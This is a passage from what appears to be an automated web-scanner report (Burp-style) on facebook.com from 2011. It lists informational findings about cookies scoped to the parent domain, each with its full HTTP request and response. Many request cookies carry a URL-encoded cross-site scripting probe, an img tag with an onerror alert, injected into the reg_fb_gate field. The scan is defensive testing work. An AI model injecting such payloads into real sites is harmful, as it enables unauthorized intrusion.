P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.75
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 68300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.49. http://www.facebook.com/lakendra.roberts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /lakendra.roberts

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lakendra.roberts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.33
Connection: close
Date: Thu, 05 May 2011 11:42:24 GMT
Content-Length: 82530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.50. http://www.facebook.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
  • next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; act=1304613664644%2F2; next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; next_path=%2Fmobile%2F%3Fsettings

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 11:43:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.37.19.117
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.51. http://www.facebook.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • _e_vm3q_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • _e_vm3q_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 12:46:07 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D1242845259; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php?next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; _e_vm3q_0=%5B%22vm3q%22%2C1304617033840%2C%22act%22%2C1304617032828%2C1%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C73%2C218%2C0%2C1006%2C16%5D; act=1304617037875%2F2; _e_vm3q_1=%5B%22vm3q%22%2C1304617037875%2C%22act%22%2C1304617037875%2C2%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C197%2C146%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_vm3q_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: _e_vm3q_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 12:46:07 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.101.59
X-Cnection: close
Date: Thu, 05 May 2011 12:46:07 GMT
Content-Length: 18187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.52. http://www.facebook.com/mapquest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mapquest

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mapquest HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/MapQuest
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.49
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 0


10.53. http://www.facebook.com/matthew.oliveira2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /matthew.oliveira2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /matthew.oliveira2 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.47
Connection: close
Date: Thu, 05 May 2011 11:42:11 GMT
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.54. http://www.facebook.com/mmafighting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mmafighting

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mmafighting HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.164.73
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 198589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.55. http://www.facebook.com/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/mobile/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.4.111
Connection: close
Date: Thu, 05 May 2011 10:56:38 GMT
Content-Length: 0


10.56. http://www.facebook.com/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; act=1304613659940%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613659942%2C%22act%22%2C1304613659940%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C469%2C478%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.25
X-Cnection: close
Date: Thu, 05 May 2011 11:41:04 GMT
Content-Length: 17082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.57. http://www.facebook.com/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
  • next_path=%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile/?settings HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; wd=1022x1007; act=1304613664644%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613664645%2C%22act%22%2C1304613664644%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmobile%2F%3Fref%3Dpf%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C181%2C760%2C0%2C1006%2C16%5D

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fmobile%2F%3Fsettings; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.51
X-Cnection: close
Date: Thu, 05 May 2011 11:43:56 GMT
Content-Length: 0


10.58. http://www.facebook.com/pages/Barnesville/115038011847083  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Barnesville/115038011847083

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Barnesville/115038011847083 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.47
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 26916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.59. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Beacon-of-Hope-Resource-Center/34194116820

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Beacon-of-Hope-Resource-Center/34194116820 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.43
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 129142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
